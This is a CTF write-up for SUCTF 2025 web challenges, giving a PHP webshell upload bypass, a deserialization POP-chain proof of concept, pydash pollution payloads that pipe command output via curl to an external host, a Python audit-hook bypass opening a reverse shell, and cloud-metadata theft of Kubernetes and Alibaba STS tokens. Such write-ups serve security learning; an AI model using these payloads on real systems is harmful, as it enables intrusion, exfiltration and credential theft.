SUCTF 2025 WEB部分wp

SU_photogallery

尝试源码泄露 https://www.cnblogs.com/Kawakaze777/p/17799235.html

<?php
error_reporting(0);

function get_extension($filename){
    return pathinfo($filename, PATHINFO_EXTENSION);
}
function check_extension($filename,$path){
    $filePath = $path . DIRECTORY_SEPARATOR . $filename;
    if (is_file($filePath)) {
        $extension = strtolower(get_extension($filename));

        if (!in_array($extension, ['jpg', 'jpeg', 'png', 'gif'])) {
            if (!unlink($filePath)) {
                // echo "Fail to delete file: $filename\n";
                return false;
                }
            else{
                // echo "This file format is not supported:$extension\n";
                return false;
                }
        }
        else{
            return true;
            }
}
else{
    // echo "nofile";
    return false;
}
}
function file_rename ($path,$file){
    $randomName = md5(uniqid().rand(0, 99999)) . '.' . get_extension($file);
                $oldPath = $path . DIRECTORY_SEPARATOR . $file;
                $newPath = $path . DIRECTORY_SEPARATOR . $randomName;

                if (!rename($oldPath, $newPath)) {
                    unlink($path . DIRECTORY_SEPARATOR . $file);
                    // echo "Fail to rename file: $file\n";
                    return false;
                }
                else{
                    return true;
                }
}

function move_file($path,$basePath){
    foreach (glob($path . DIRECTORY_SEPARATOR . '*') as $file) {
        $destination = $basePath . DIRECTORY_SEPARATOR . basename($file);
        if (!rename($file, $destination)){
            // echo "Fail to rename file: $file\n";
            return false;
        }
    }
    return true;
}


function check_base($fileContent){
    $keywords = ['eval', 'base64', 'shell_exec', 'system', 'passthru', 'assert', 'flag', 'exec', 'phar', 'xml', 'DOCTYPE', 'iconv', 'zip', 'file', 'chr', 'hex2bin', 'dir', 'function', 'pcntl_exec', 'array', 'include', 'require', 'call_user_func', 'getallheaders', 'get_defined_vars','info'];
    $base64_keywords = [];
    foreach ($keywords as $keyword) {
        $base64_keywords[] = base64_encode($keyword);
    }
    foreach ($base64_keywords as $base64_keyword) {
        if (strpos($fileContent, $base64_keyword)!== false) {
            return true;

        }
        else{
           return false;

        }
    }
}

function check_content($zip){
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $fileInfo = $zip->statIndex($i);
        $fileName = $fileInfo['name'];
        if (preg_match('/\.\.(\/|\.|%2e%2e%2f)/i', $fileName)) {
            return false; 
        }
            // echo "Checking file: $fileName\n";
            $fileContent = $zip->getFromName($fileName);
            

            if (preg_match('/(eval|base64|shell_exec|system|passthru|assert|flag|exec|phar|xml|DOCTYPE|iconv|zip|file|chr|hex2bin|dir|function|pcntl_exec|array|include|require|call_user_func|getallheaders|get_defined_vars|info)/i', $fileContent) || check_base($fileContent)) {
                // echo "Don't hack me!\n";                return false;
            }
            else {
                continue;
            }
        }
    return true;
}

function unzip($zipname, $basePath) {
    $zip = new ZipArchive;

    if (!file_exists($zipname)) {
        // echo "Zip file does not exist";
        return "zip_not_found";
    }
    if (!$zip->open($zipname)) {
        // echo "Fail to open zip file";
        return "zip_open_failed";
    }
    if (!check_content($zip)) {
        return "malicious_content_detected";
    }
    $randomDir = 'tmp_'.md5(uniqid().rand(0, 99999));
    $path = $basePath . DIRECTORY_SEPARATOR . $randomDir;
    if (!mkdir($path, 0777, true)) {
        // echo "Fail to create directory";
        $zip->close();
        return "mkdir_failed";
    }
    if (!$zip->extractTo($path)) {
        // echo "Fail to extract zip file";
        $zip->close();
    }
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $fileInfo = $zip->statIndex($i);
        $fileName = $fileInfo['name'];
        if (!check_extension($fileName, $path)) {
            // echo "Unsupported file extension";
            continue;
        }
        if (!file_rename($path, $fileName)) {
            // echo "File rename failed";
            continue;
        }
    }
    if (!move_file($path, $basePath)) {
        $zip->close();
        // echo "Fail to move file";
        return "move_failed";
    }
    rmdir($path);
    $zip->close();
    return true;
}


$uploadDir = DIR . DIRECTORY_SEPARATOR . 'upload/suimages/';
if (!is_dir($uploadDir)) {
    mkdir($uploadDir, 0777, true);
}

if (isset($_FILES['file']) && $_FILES['file']['error'] === UPLOAD_ERR_OK) {
    $uploadedFile = $_FILES['file'];
    $zipname = $uploadedFile['tmp_name'];
    $path = $uploadDir;

    $result = unzip($zipname, $path);
    if ($result === true) {
        header("Location: index.html?status=success");
        exit();
    } else {
        header("Location: index.html?status=$result");
        exit();
    }
} else {
    header("Location: index.html?status=file_error");
    exit();
}

由于他是先解压再检验移动，只要上传一个文件名超极长的zip，或者把zip的名字写成乱码，他解压就会炸掉。文件就直接保存到upload/suimages/了。此时我们就可以访问我们的马来rce。

然后只需要绕一下黑名单，这个很简单，比如

<?php
$a="php";
$b="info";
$a.$b();

SUCTF{sti1l_w0t3r_Run_d@@p!!!}

SU_POP

反序列化点在routes.php找的到

/ser?ser=base64的序列化链子。

php反序列化的入口一般是先找__destruct()，所以先全局搜，然后找可以用的__destruct()。

在src\vendor\react\promise\src\Internal\RejectedPromise.php中

reason和handler属性可控，红框圈起来的地方可以调到__toString，再找找__tostring。

src\vendor\cakephp\cakephp\src\Http\Response.php里，

这里stream属性可控，就能调到任意类的__call方法。

src/vendor/cakephp/cakephp/src/ORM/Table.php

public function __call(string $method, array $args): mixed
{
    if ($this->_behaviors->hasMethod($method)) {
        return $this->_behaviors->call($method, $args);
    }
    if (preg_match('/^find(?:\w+)?By/', $method) > 0) {
        return $this->_dynamicFinder($method, $args);
    }

    throw new BadMethodCallException(
        sprintf('Unknown method `%s` called on `%s`', $method, static::class),
    );
}

这里method可控，hasMethod方法可以返回true，同样的has方法也可以，那就可以进到：

这里behavior和callMethod都可控，只是参数不可控，没关系，我们上面调用的__call也正是无参的。那现在可以调用任意类的任意方法了。我们需要找能rce的地方，并且那个地方不需要参数或者参数跟那个函数需要的形参无关。

src\vendor\phpunit\phpunit\src\Framework\MockObject\Generator\MockClass.php

generate这个函数里有eval，而且与传入的参数args无关，里面classCode和mockName的内容可控。

所以链子就形成了：

RejectedPromise::__destruct()->Response::__toString()->Table::__call()->BehaviorRegistry::call()->MockClass::->generate()

链子构造细节这里不多赘述

构造poc：

<?php
namespace React\Promise\Internal;
use Cake\Http\Response;
final class RejectedPromise
{
    private $reason;
    private $handled = false;
    public function __construct(){
        $this->reason = new Response();
    }
}

namespace Cake\Http;
use Cake\ORM\Table;
class Response
{
    private $stream;
    public function __construct(){
        $this->stream = new Table();
    }
}
namespace Cake\ORM;
use PHPUnit\Framework\MockObject\Generator\MockClass;
class Table{
    protected BehaviorRegistry $_behaviors;
    public function __construct(){
        $this->_behaviors = new BehaviorRegistry();
    }
}

class ObjectRegistry{}
class BehaviorRegistry extends ObjectRegistry
{
    protected array $_methodMap;
    protected array $_loaded = [];
    public function __construct(){
        $this->_methodMap = ["rewind"=>array("aaa","generate")];
        $this->_loaded = ["aaa"=>new MockClass()];
    }
}
namespace PHPUnit\Framework\MockObject\Generator;

use function call_user_func;
use function class_exists;
final class MockClass
{
    private readonly string $mockName;
    private readonly string $classCode;
    public function __construct() {
        $this->mockName = "aaa";
        $this->classCode = "phpinfo();";
    }

}

namespace React\Promise\Internal;
$a = new RejectedPromise();
echo base64_encode(serialize($a));

发现要提权，找suid权限的命令：

find提权。system('find / -name flag.txt -exec cat {} \;');

SU_blog

先注册：admin/123465

然后登录。

在文章页面可以读取文章，file很明显可以读文件，这里的参数内容必须要以articles开头，所以要目录穿越，而../被置空(articles/../text1.txt是原来的内容)，所以可以双写绕过，拿源码。

读文件没读到flag，应该是要rce

from flask import *
import time,os,json,hashlib
from pydash import set_
from waf import pwaf,cwaf

app = Flask(__name__)
app.config['SECRET_KEY'] = hashlib.md5(str(int(time.time())).encode()).hexdigest()

users = {"testuser": "password"}
BASE_DIR = '/var/www/html/myblog/app'

articles = {
    1: "articles/article1.txt",
    2: "articles/article2.txt",
    3: "articles/article3.txt"
}

friend_links = [
    {"name": "bkf1sh", "url": "https://ctf.org.cn/"},
    {"name": "fushuling", "url": "https://fushuling.com/"},
    {"name": "yulate", "url": "https://www.yulate.com/"},
    {"name": "zimablue", "url": "https://www.zimablue.life/"},
    {"name": "baozongwi", "url": "https://baozongwi.xyz/"},
]

class User():
    def __init__(self):
        pass

user_data = User()
@app.route('/')
def index():
    if 'username' in session:
        return render_template('blog.html', articles=articles, friend_links=friend_links)
    return redirect(url_for('login'))

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        if username in users and users[username] == password:
            session['username'] = username
            return redirect(url_for('index'))
        else:
            return "Invalid credentials", 403
    return render_template('login.html')

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        users[username] = password
        return redirect(url_for('login'))
    return render_template('register.html')


@app.route('/change_password', methods=['GET', 'POST'])
def change_password():
    if 'username' not in session:
        return redirect(url_for('login'))

    if request.method == 'POST':
        old_password = request.form['old_password']
        new_password = request.form['new_password']
        confirm_password = request.form['confirm_password']

        if users[session['username']] != old_password:
            flash("Old password is incorrect", "error")
        elif new_password != confirm_password:
            flash("New passwords do not match", "error")
        else:
            users[session['username']] = new_password
            flash("Password changed successfully", "success")
            return redirect(url_for('index'))

    return render_template('change_password.html')


@app.route('/friendlinks')
def friendlinks():
    if 'username' not in session or session['username'] != 'admin':
        return redirect(url_for('login'))
    return render_template('friendlinks.html', links=friend_links)


@app.route('/add_friendlink', methods=['POST'])
def add_friendlink():
    if 'username' not in session or session['username'] != 'admin':
        return redirect(url_for('login'))

    name = request.form.get('name')
    url = request.form.get('url')

    if name and url:
        friend_links.append({"name": name, "url": url})

    return redirect(url_for('friendlinks'))


@app.route('/delete_friendlink/<int:index>')
def delete_friendlink(index):
    if 'username' not in session or session['username'] != 'admin':
        return redirect(url_for('login'))

    if 0 <= index < len(friend_links):
        del friend_links[index]

    return redirect(url_for('friendlinks'))

@app.route('/article')
def article():
    if 'username' not in session:
        return redirect(url_for('login'))

    file_name = request.args.get('file', '')
    if not file_name:
        return render_template('article.html', file_name='', content="未提供文件名。")

    blacklist = ["waf.py"]
    if any(blacklisted_file in file_name for blacklisted_file in blacklist):
        return render_template('article.html', file_name=file_name, content="大黑阔不许看")
    
    if not file_name.startswith('articles/'):
        return render_template('article.html', file_name=file_name, content="无效的文件路径。")
    
    if file_name not in articles.values():
        if session.get('username') != 'admin':
            return render_template('article.html', file_name=file_name, content="无权访问该文件。")
    
    file_path = os.path.join(BASE_DIR, file_name)
    file_path = file_path.replace('../', '')
    
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            content = f.read()
    except FileNotFoundError:
        content = "文件未找到。"
    except Exception as e:
        app.logger.error(f"Error reading file {file_path}: {e}")
        content = "读取文件时发生错误。"

    return render_template('article.html', file_name=file_name, content=content)


@app.route('/Admin', methods=['GET', 'POST'])
def admin():
    if request.args.get('pass')!="SUers":
        return "nonono"
    if request.method == 'POST':
        try:
            body = request.json

            if not body:
                flash("No JSON data received", "error")
                return jsonify({"message": "No JSON data received"}), 400

            key = body.get('key')
            value = body.get('value')

            if key is None or value is None:
                flash("Missing required keys: 'key' or 'value'", "error")
                return jsonify({"message": "Missing required keys: 'key' or 'value'"}), 400

            if not pwaf(key):
                flash("Invalid key format", "error")
                return jsonify({"message": "Invalid key format"}), 400

            if not cwaf(value):
                flash("Invalid value format", "error")
                return jsonify({"message": "Invalid value format"}), 400

            set_(user_data, key, value)

            flash("User data updated successfully", "success")
            return jsonify({"message": "User data updated successfully"}), 200

        except json.JSONDecodeError:
            flash("Invalid JSON data", "error")
            return jsonify({"message": "Invalid JSON data"}), 400
        except Exception as e:
            flash(f"An error occurred: {str(e)}", "error")
            return jsonify({"message": f"An error occurred: {str(e)}"}), 500

    return render_template('admin.html', user_data=user_data)


@app.route('/logout')
def logout():
    session.pop('username', None)
    flash("You have been logged out.", "info")
    return redirect(url_for('login'))



if __name__ == '__main__':
    app.run(host='0.0.0.0',port=5000)

很多地方用不到，主要是Admin路由。

set_(user_data, key, value)

源码里引了pydash库的_set方法，初步断定是原型链污染。

把数字和__loader__过滤了，好像只有2没过滤。

https://furina.org.cn/2023/12/18/prototype-pollution-in-pydash-ctf/

loader被过滤了，可以用某个模块的__spec__.__init__.__globals__来拿sys。

ps：这里也可以通过覆盖waf来使用loader

{"key":"__init__.__globals__.pwaf.__globals__.key_blacklist_bytes","value":""}

本地调试发现有globals，试试出不出网，不出网可以写静态文件。

{
    "key":"__init__.__globals__.globals.__spec__.__init__.__globals__.sys.modules.jinja2.runtime.exported.2",
    "value":"*;import os;os.system('l''s -al / | curl -d @- bxyyymgu.requestrepo.com')"
}

由于是公共靶机，这个打一次就不行了，很麻烦，搓了个脚本一直发：

import requests
import time

url1 = "http://27.25.151.48:5000/Admin?pass=SUers"
url2 = "http://27.25.151.48:5001/Admin?pass=SUers"

cookies = {"session":"eyJ1c2VybmFtZSI6ImFkbWluIn0.Z4MUfA.gaWUfOrunhWrYl1po8bZCWjzePk"}

json = {
    "key":"__init__.__globals__.globals.__spec__.__init__.__globals__.sys.modules.jinja2.runtime.exported.2",
    "value":"*;import os;os.system('l''s -al / | curl -d @- bxyyymgu.requestrepo.com')"
}
while True:
    res = requests.post(url1, cookies=cookies,json=json)
    print(res.text)
    print(requests.get(url1,cookies=cookies).text)

    res = requests.post(url2, cookies=cookies,json=json)
    print(res.text)
    print(requests.get(url2,cookies=cookies).text)
    time.sleep(5)

有一个readflag，那直接执行了

{
    "key":"__init__.__globals__.globals.__spec__.__init__.__globals__.sys.modules.jinja2.runtime.exported.2",
    "value":"*;import os;os.system('/read''f''lag | curl -d @- bxyyymgu.requestrepo.com')"
}

一血拿下！

SUCTF{fl4sk_1s_5imp1e_bu7_pyd45h_1s_n0t_s0_I_l0v3}

SU_easyk8s_on_aliyun(REALLY VERY EASY)

import os

# 遍历当前目录中的文件
for root, dirs, files in os.walk("."):
    for file in files:
        file_path = os.path.join(root, file)  # 拼接文件的完整路径
        print(f"Reading file: {file_path}")
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                content = f.read()  # 读取文件内容
                print(f"Content of {file_path}:\n{content}")
        except Exception as e:
            print(f"Error reading {file_path}: {e}")

读到源码，audit.py

import sys

DEBUG = False

def audit_hook(event, args):
    audit_functions = {
        "os.system": {"ban": True},
        "subprocess.Popen": {"ban": True},
        "subprocess.run": {"ban": True},
        "subprocess.call": {"ban": True},
        "subprocess.check_call": {"ban": True},
        "subprocess.check_output": {"ban": True},
        "_posixsubprocess.fork_exec": {"ban": True},
        "os.spawn": {"ban": True},
        "os.spawnlp": {"ban": True},
        "os.spawnv": {"ban": True},
        "os.spawnve": {"ban": True},
        "os.exec": {"ban": True},
        "os.execve": {"ban": True},
        "os.execvp": {"ban": True},
        "os.execvpe": {"ban": True},
        "os.fork": {"ban": True},
        "shutil.run": {"ban": True},
        "ctypes.dlsym": {"ban": True},
        "ctypes.dlopen": {"ban": True}
    }
    if event in audit_functions:
        if DEBUG:
            print(f"[DEBUG] found event {event}")
        policy = audit_functions[event]
        if policy["ban"]:
            strr = f"AUDIT BAN : Banning FUNC:[{event}] with ARGS: {args}"
            print(strr)
            raise PermissionError(f"[AUDIT BANNED]{event} is not allowed.")
        else:
            strr = f"[DEBUG] AUDIT ALLOW : Allowing FUNC:[{event}] with ARGS: {args}"
            print(strr)
            return

sys.addaudithook(audit_hook)

main.py

from flask import Flask, render_template, request, url_for, flash, redirect

app = Flask(__name__)

import sys

import subprocess

import os

"""
HINT: RCE me! 
"""

INDEX_HTML = '''
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Python Executor</title>
</head>
<body>
   <h1>Welcome to PyExector</h1>

   <textarea id="code" style="width: 100%; height: 200px;" rows="10000" cols="10000" ></textarea>

   <button onclick="run()">Run</button>

    <h2>Output</h2>
    <pre id="output"></pre>

    <script>
        function run() {
            var code = document.getElementById("code").value;

            fetch("/run", {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    code: code
                })
            })
            .then(response => response.text())
            .then(data => {
                document.getElementById("output").innerText = data;
            });
        }
    </script>
</body>
</html>
'''

@app.route('/')
def hello():
    return INDEX_HTML

@app.route("/run", methods=["POST"])
def runCode():
    code = request.json["code"]
    cmd = [sys.executable,  "-i", f"{os.getcwd()}/audit.py"]
    p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
    return p.communicate(input=code.encode('utf-8'))[0]


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

提示是让RCE。

https://xz.aliyun.com/t/12647?time__1311=GqGxuDRiYiwxlrzG7DyGQjb2if0ox#toc-35

import os
import _posixsubprocess

_posixsubprocess.fork_exec([b"aaa","/"], [b"/bin/ls"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)

这样可以rce了。

弹shell

import os
import _posixsubprocess

_posixsubprocess.fork_exec([b"","-c","{echo,xxxx}|{base64,-d}|{bash,-i}"], [b"/bin/bash"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)

/var/run/secrets/kubernetes.io/serviceaccount/token

eyJhbGciOiJSUzI1NiIsImtpZCI6IkRucGZMWXZWdjlIcUx5bGNlWGVELWljN0NqUlo4bHNFWGlKVDNBX0hhUm8ifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJ
rM3MiXSwiZXhwIjoxNzY4MjAyNjE4LCJpYXQiOjE3MzY2NjY2MTgsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiNGVlODQyYzctYzg4Zi00NjExLWFkNTgtM
2VmMDBlMzc5ZTNjIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiaXpicDFjbzZwemhmZ3hreXF4NHZmd3oiLCJ1aWQiOiIxODhlNDBhNC1kOTM3LTQ5ODMtOThhOS0
5ZDY0NjUzODM0NDMifSwicG9kIjp7Im5hbWUiOiJjdGYtZGVwbG95bWVudC03ZDg1ZDg0ODg4LTh3YzduIiwidWlkIjoiMWVlNjU5ZjctMWIzMS00NDY5LTlhZWItNzFlMzNhNGQ1N2Y4In0sInNlcnZpY2VhY2NvdW50I
jp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiMWM0MGZjYWYtM2NkZS00OGUyLTkzOTYtZDBlOGY3ZTlhZjcyIn0sIndhcm5hZnRlciI6MTczNjY3MDIyNX0sIm5iZiI6MTczNjY2NjYxOCwic3ViIjoic3lzdGVtOnNlcnZ
pY2VhY2NvdW50OmRlZmF1bHQ6ZGVmYXVsdCJ9.p_VyIStlWJbygScXdozYOyuBWut9LDC5Kwb2Y5YK66AG1tf4RKDtaeS47v3twhxfO9SdInudxS0-Gp7fqnqVy6M1-AuLYx3_UeBIvXRPTfmU0nCHIkSYVYDwMCn4KMq3
dp3HsoW_LE3M1oykLRe3z80-72YN4pbNXiCHLdgA5sKXl1xOJidpa7mu-Ta7UJn-hV3-5F4HIqHaIMCw9_r67suLoQX7JcCr1rIf0KYX4C12GpeXfeAR2d-i66dhrzp9rCyPx942CkhTtqegiQ-QqgDYAWDNYvOnpgV7S8
lKuURMKGlzuBM1nffuebF5wVoohurVjFwnBk7m99A9CmqERQ

发现serviceaccount相关文件，连接api执行can-i发现没有权限，换其他方案

CDK扫描结果

CDK (Container DucK)
CDK Version(GitCommit): 251f18c614f925f26569f9cc6177c3b3fd656bd2
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
        /usr/bin/chfn
        /usr/bin/chsh
        /usr/bin/gpasswd
        /usr/bin/mount
        /usr/bin/newgrp
        /usr/bin/passwd
        /usr/bin/su
        /usr/bin/umount
        /bin/chfn
        /bin/chsh
        /bin/gpasswd
        /bin/mount
        /bin/newgrp
        /bin/passwd
        /bin/su
        /bin/umount

[  Information Gathering - Services  ]

[  Information Gathering - Commands and Capabilities  ]
        CapInh: 0000000000000000
        CapPrm: 0000000000000000
        CapEff: 0000000000000000
        CapBnd: 00000000a80425fb
        CapAmb: 0000000000000000
        Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:389 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/783/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/782/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/781/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/114/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/113/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/112/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/110/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/109/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/108/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/107/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/106/fs,upperdir=/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/2136/fs,workdir=/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/2136/work
0:447 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:448 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:449 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:394 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:414 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:30 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
252:3 /var/lib/kubelet/pods/cf3c0f7c-6f8e-4ec7-96ab-afaabf79f3b9/etc-hosts /etc/hosts rw,relatime - ext4 /dev/vda3 rw
252:3 /var/lib/kubelet/pods/cf3c0f7c-6f8e-4ec7-96ab-afaabf79f3b9/containers/vuln-container/f30344ca /dev/termination-log rw,relatime - ext4 /dev/vda3 rw
252:3 /var/lib/rancher/k3s/agent/containerd/io.containerd.grpc.v1.cri/sandboxes/3d083d23aa076f9e4d21b1499fc54b3c610ec06454d7f646e19229c0e660f714/hostname /etc/hostname rw,relatime - ext4 /dev/vda3 rw
252:3 /var/lib/rancher/k3s/agent/containerd/io.containerd.grpc.v1.cri/sandboxes/3d083d23aa076f9e4d21b1499fc54b3c610ec06454d7f646e19229c0e660f714/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/vda3 rw
0:368 / /dev/shm rw,relatime - tmpfs shm rw,size=65536k,inode64
0:366 / /run/secrets/kubernetes.io/serviceaccount ro,relatime - tmpfs tmpfs rw,size=7441152k,inode64
0:447 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:447 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:447 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:447 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:447 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:450 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:448 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:448 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:448 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:451 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:452 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
0:453 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro,inode64

[  Information Gathering - Net Namespace  ]
        container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 10.43.0.10:53: no such host
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 10.43.0.10:53: no such host

[  Discovery - K8s API Server  ]
err found in post request, error response code: 401 Unauthorized.
        api-server forbids anonymous request.
        response:{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}


[  Discovery - K8s Service Account  ]
        service-account is available
err found in post request, error response code: 403 Forbidden.

[  Discovery - Cloud Provider Metadata API  ]
        Alibaba Cloud Metadata API available in http://100.100.100.200/latest/meta-data/
        Docs: https://help.aliyun.com/knowledge_detail/49122.html

[  Exploit Pre - Kernel Exploits  ]
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded



[  Information Gathering - Sensitive Files  ]
        /.bashrc - /etc/skel/.bashrc
        /serviceaccount - /run/secrets/kubernetes.io/serviceaccount

[  Information Gathering - ASLR  ]

[  Information Gathering - Cgroups  ]
        0::/

发现阿里云metadata，在ram中找到一个STS token

http://100.100.100.200/latest/meta-data/ram/security-credentials/oss-root

{
  "AccessKeyId" : "STS.NTfZuo3n761cQMys2MNiNBo9a",
  "AccessKeySecret" : "5zbrTpf6iWzMu6DdPpy42ZCj2kDfrwbte4JT9LLCQBzY",
  "Expiration" : "2025-01-12T14:05:03Z",
  "SecurityToken" : "CAIS1AJ1q6Ft5B2yfSjIr5fTEc/b3rEWgfOIU2vIlzIYQuZiraqSgzz2IHhMdHRqBe0ctvQ+lG5W6/4YloltTtpfTEmBc5I179Fd6VqqZNTZqcy74qwHmYS1RXadFEZYDnNszr+rIunGc9KBNnrm9EYqs5aYGBymW1u6S+7r7bdsctUQWCShcDNCH604DwB+qcgcRxCzXLTXRXyMuGfLC1dysQdRkH527b/FoveR8R3Dllb3uIR3zsbTWsH6MZc1Z8wkDovsjbArKvL7vXQOu0QQxsBfl7dZ/DrLhNaZDmRK7g+OW+iuqYU3fFIjOvVgQ/4V/KaiyKUioIzUjJ+y0RFKIfHnm/ES9DUVqiGtOpRKVr5RHd6TUxxGgmVUsD3M+Eqi7Sau0K+e5xjFvkUxaHpiA3iRUcyMsxuRQWyIEOP+y9oVsqEYoRiWu7TDSTeBK6PPRvNGUvdUGoABfmqFersd5q3sAhpi7UHmtkhuEn8jODpY4bxubpPLrQwZu7ToyzoWY9vERJzKarge1l3oM9jQP+q30t86v6WxFy2RHh97iDaIEUh3gpL9Mxu9fi4aRYzPZ2qhdZNCdWlE3CrGCuPAsoU0g3JUohJJnycnBj9o54Tdk4cTkjugEyUgAA==",
  "LastUpdated" : "2025-01-12T08:05:03Z",
  "Code" : "Success"
}

存入阿里云cli STS登录，看到bucket，ls后为空，想到版本控制加入–all-versions

| 1 | suctf-flag-bucket | N/A | 0 | 0.00 B | cn-hangzhou | https://suctf-flag-bucket.oss-cn-hangzhou.aliyuncs.com |

#aliyun oss ls oss://suctf-flag-bucket  --all-versions
LastModifiedTime                   Size(B)  StorageClass  ETAG                                  VERSIONID                                                           IS-LATEST   DELETE-MARKER  ObjectName
2025-01-11 21:30:39 +0800 CST            0                                                      CAEQmwIYgoDA2sKe1qIZIiA2NmViNDQ2NWVjNzk0MzQ1YjdiNjdkYTE5ZjYwNTQyMg--  true        true           oss://suctf-flag-bucket/oss-flagx
2025-01-11 21:30:03 +0800 CST           76      Standard  7246CE228374D17256B45DDF88E891A0      CAEQmwIYgYDA6Lad1qIZIiAyMjBhNWVmMDRjYzY0MDI3YjhiODU3ZDQ2MDc1MjZhOA--  false       false          oss://suctf-flag-bucket/oss-flag
Object Number is: 2

看到版本，读取flag

#aliyun oss cat oss://suctf-flag-bucket/oss-flag --version-id CAEQmwIYgYDA6Lad1qIZIiAyMjBhNWVmMDRjYzY0MDI3YjhiODU3ZDQ2MDc1MjZhOA--

SUCTF{kubernetes_is_not_only_the_cloud-a09f950a-eb89-46f4-b381-fec7c9a0023a}